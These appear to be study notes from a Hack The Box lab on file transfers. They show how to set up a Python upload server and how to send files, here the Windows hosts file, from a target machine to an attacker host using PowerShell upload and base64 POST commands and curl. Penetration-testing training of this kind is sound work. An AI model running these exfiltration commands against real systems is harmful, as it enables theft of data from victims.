## Installing a Configured WebServer with Upload

[ Online ]
```
Jean-24@htb[/htb]$ pip3 install uploadserver
```

[ Off-Online ]

Download **uploadserver-4.2.0-py3-none-any.whl**
```
pip3 install uploadserver-4.2.0-py3-none-any.whl

```

## Run uploadserver

```
Jean-24@htb[/htb]$ python3 -m uploadserver
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

## Upload

### Windows - PowerShell Upload a File to Python Upload Server

```
PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

[+] File Uploaded:  C:\Windows\System32\drivers\etc\hosts
[+] FileHash:  5E7241D66FD77E9E8EA866B6278B2373
```

### Windows - PowerShell Base64 Web Upload

Another way to use PowerShell and base64 encoded files for upload operations is by using Invoke-WebRequest or Invoke-RestMethod together with Netcat. We use Netcat to listen in on a port we specify and send the file as a POST request. Finally, we copy the output and use the base64 decode function to convert the base64 string into a file.
```
PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
```

### Linux - Bash Upload a File to Python Upload Server

```
[automation@fedoraserver ~]$ curl -X POST http://localhost:8000/upload -F 'files=@messages.txt'
```
